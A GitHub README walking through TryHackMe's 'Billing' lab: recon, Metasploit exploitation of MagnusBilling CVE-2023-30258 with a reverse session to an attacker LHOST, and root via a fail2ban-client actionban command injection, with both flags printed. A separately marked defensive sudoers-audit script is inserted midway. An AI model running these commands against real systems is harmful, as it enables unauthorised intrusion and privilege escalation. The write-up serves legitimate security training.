AdityaBhatt3010/TryHackMe-Room-Walkthrough-Billing

🧠 TryHackMe Room Walkthrough: Billing

Room Link: https://tryhackme.com/room/billing
Written by: Aditya Bhatt | THM Addict



📦 Overview

In this walkthrough, we go full force into TryHackMe's Billing room, showcasing a vulnerable MagnusBilling instance, a juicy unauthenticated RCE (CVE-2023-30258), and a fail2ban sudo misconfiguration that screams “root me.”

This room beautifully blends automated exploitation with creative privilege escalation, giving us a hands-on taste of real-world flaws hiding in VoIP billing software. We’ll go from initial recon to root shell with full PoC, commentary, and 🗿 vibes.


🌐 Step 1: Enumeration Phase

🏁 Initial Landing

After deploying the machine, the first thing that hits you like a misconfigured firewall:

http://<machine_IP>/mbilling/

This is the MagnusBilling login page. That alone triggers bells: you know you’re in for some juicy CVE play.



πŸ” Nmap Deep Recon + Gobuster

We begin with the ultimate recon combo:

nmap -A -sV -p- 10.10.115.173

🧠 Findings:

  • Port 5038 – Asterisk Call Manager/2.10.6
  • Other HTTP services are available under /mbilling/

Next, we go full brute with Gobuster:

gobuster dir -u http://10.10.115.173/mbilling -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .php,.html,.txt
gobuster dir -u http://10.10.115.173/ -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .php,.html,.txt

🧠 Findings:

  • robots.txt


πŸ—οΈ robots.txt

Then we check the site's robots.txt for anything spicy:

User-agent: *
Disallow: /mbilling/

Hmm… trying to hide it just makes us want it more 😈



🔌 Step 2: Exploitation

🔥 Port 5038 – Asterisk Manager

A quick netcat test confirms it responds with:

Response: Error
Message: Missing action in request

This confirms it further: the backend is MagnusBilling, and port 5038 is its Asterisk Call Manager interface. Time to summon our dark arts 🧙



βš”οΈ Weapon of Choice: CVE-2023-30258

Exploit: Unauthenticated Remote Code Execution in MagnusBilling
Module: exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258

Fire up Metasploit:

msfconsole
use exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258


Then check the requirements:

show options


Then set the following:

set RHOSTS 10.10.115.173
set LHOST 10.17.88.138
run


A few seconds later… Boom. We got a Meterpreter session!

shell
whoami ➀ asterisk
uname -a ➀ Linux Debian 6.1 x86_64

We then spawn a proper TTY shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'



🧭 Step 3: User Enumeration

We start traversing upward with:

cd ..
cd ..


Until we find:

cd /home/magnus
cat user.txt


🏁 User Flag: THM{4a6831d5f124b25eefb1e92e0f0da4ca}

Nice! But we’re not done. We need root, and Magnus is whispering secrets to us.


🧨 Step 4: Privilege Escalation

Let’s check what we can run with sudo:

sudo -l

Result:

(ALL) NOPASSWD: /usr/bin/fail2ban-client

Now this is 🔥. We can abuse fail2ban-client to execute commands as root using ban actions.
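Flipping to the defender's side for a moment: the rule above is dangerous because fail2ban-client accepts any arguments, and `set <jail> action <name> actionban <cmd>` rewrites what fail2ban runs as root on the next ban. The following sudoers audit, an added example that is not part of the original walkthrough or the room, flags exactly that class of grant. The sudoers text is constructed here; only the magnus line mirrors the `sudo -l` output above, and the list of "arbitrary exec" binaries is an assumption of the example rather than a complete catalogue.

```python
"""Audit sudoers-style rules for grants that hand a non-root user root-level
arbitrary command execution (the misconfiguration this room's privesc relies on)."""
import re
from dataclasses import dataclass
from typing import Iterator, List, Tuple

# Constructed sample (not the room's real /etc/sudoers). The magnus line mirrors
# the `sudo -l` result in the walkthrough; the others are benign contrasts.
SAMPLE_SUDOERS = """\
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
magnus  ALL=(ALL) NOPASSWD: /usr/bin/fail2ban-client
deploy  ALL=(ALL) NOPASSWD: /usr/bin/systemctl restart nginx
asterisk ALL=(root) NOPASSWD: /usr/bin/fail2ban-client status, /usr/bin/journalctl -u fail2ban
"""

# Assumed (non-exhaustive) set of binaries that, when runnable as root with
# unrestricted arguments, let the caller execute arbitrary commands.
ARBITRARY_EXEC = {
    "/usr/bin/fail2ban-client": "actionban/actionunban can be rewritten at runtime",
    "/bin/bash": "interactive shell",
    "/bin/sh": "interactive shell",
    "/usr/bin/python3": "interpreter",
    "ALL": "every command",
}

TAGS = ("NOPASSWD", "PASSWD", "SETENV", "NOSETENV", "NOEXEC", "EXEC",
        "LOG_INPUT", "NOLOG_INPUT", "LOG_OUTPUT", "NOLOG_OUTPUT")
# user host=(runas) cmnd_spec_list   (runas part optional)
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<spec>.+)$")
TAG_RE = re.compile(r"^(" + "|".join(TAGS) + r"):\s*")
SKIP_PREFIXES = ("Defaults", "User_Alias", "Runas_Alias", "Host_Alias", "Cmnd_Alias")


@dataclass(frozen=True)
class Finding:
    user: str
    command: str
    nopasswd: bool
    reason: str


def parse_rule(line: str) -> Iterator[Tuple[str, str, bool, str]]:
    """Yield (user, runas_user, nopasswd, command) for each command in a user spec."""
    m = RULE_RE.match(line)
    if not m:
        return
    user, spec = m["user"], m["spec"]
    runas_user = (m["runas"] or "root").split(":")[0].strip()
    nopasswd = False  # sudoers tags persist across the comma-separated list until overridden
    for entry in spec.split(","):
        entry = entry.strip()
        while (t := TAG_RE.match(entry)):
            if t.group(1) == "NOPASSWD":
                nopasswd = True
            elif t.group(1) == "PASSWD":
                nopasswd = False
            entry = entry[t.end():]
        yield user, runas_user, nopasswd, entry


def audit_sudoers(text: str) -> List[Finding]:
    """Return the rules that give a non-root user unrestricted root-level command execution."""
    findings: List[Finding] = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()           # drop comments and blanks
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        for user, runas_user, nopasswd, command in parse_rule(line):
            if user == "root" or runas_user not in ("ALL", "root"):
                continue
            binary, _, args = command.partition(" ")
            # A rule that spells out arguments is limited to exactly those arguments,
            # so only a bare binary (any args allowed) or ALL is treated as unrestricted.
            if args.strip() or binary not in ARBITRARY_EXEC:
                continue
            if binary == "ALL" and not nopasswd:
                continue                              # ordinary admin grant behind a password
            findings.append(Finding(user, binary, nopasswd, ARBITRARY_EXEC[binary]))
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        flag = "NOPASSWD" if f.nopasswd else "password"
        print(f"[!] {f.user}: {f.command} ({flag}) -> {f.reason}")
```

Run against the sample, the audit reports only the magnus rule: deploy's grant is pinned to `systemctl restart nginx`, and asterisk's is pinned to `fail2ban-client status`, so sudo itself refuses any other argument list. That is also the fix for the room's misconfiguration: if a service account genuinely needs fail2ban-client, grant the specific subcommands it uses rather than the bare binary.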


🎯 Fail2Ban Abuse → Root Shell

Let’s restart fail2ban:

sudo /usr/bin/fail2ban-client restart

Then inject the command to steal the root flag:

sudo /usr/bin/fail2ban-client set sshd action iptables-multiport actionban "/bin/bash -c 'cat /root/root.txt > /tmp/root.txt && chmod 777 /tmp/root.txt'"

Trigger the ban (and thus the command):

sudo /usr/bin/fail2ban-client set sshd banip 127.0.0.1

Then:

cat /tmp/root.txt


🏁 Root Flag: THM{33ad5b530e71a172648f424ec23fae60}

Rooted. Like. A. Boss. 🗿🔥


✅ Final Recap Table

🔎 Stage              | 💥 Action/Tool Used
----------------------|-----------------------------------------------------------------
Initial Access        | Discovered /mbilling portal and port 5038 using Nmap + Gobuster
Recon Discovery       | MagnusBilling CMS + Asterisk Call Manager
Exploitation          | CVE-2023-30258 via Metasploit → Meterpreter shell
Enumeration           | Located /home/magnus/user.txt
Privilege Escalation  | Abused fail2ban-client sudo NOPASSWD → RCE as root
Root Flag             | Retrieved /root/root.txt via fail2ban payload injection

🧠 What You Learned (a.k.a. Semi-Pro Wisdom)

  1. πŸ” Recon isn’t just scanning – Look for hidden pages, check robots.txt, and dig into weird ports.
  2. πŸ’£ Exploit known CVEs – MagnusBilling was vulnerable to a public exploit (CVE-2023-30258).
  3. πŸ”“ Privilege escalation doesn't always mean kernel exploits – Misconfigured sudo rights (like on fail2ban-client) are just as dangerous.
  4. βš™οΈ Creativity matters – Bypassing user restrictions with ban actions shows real-world lateral thinking.

🗿 Final Words

This box was a beautiful balance of automated exploitation and manual post-exploitation creativity. From MagnusBilling RCE to fail2ban-rooting, it hits all the right notes for a pentester’s playlist 🎧🎯

Whether you're a beginner looking to level up or a seasoned warrior collecting flags, this one’s a must-pwn.

Until next time, Stay Dangerous. Stay Curious. Stay Majestic. 🗿


About

A detailed walkthrough of TryHackMe's Billing room exploiting CVE-2023-30258 and escalating via fail2ban misconfig
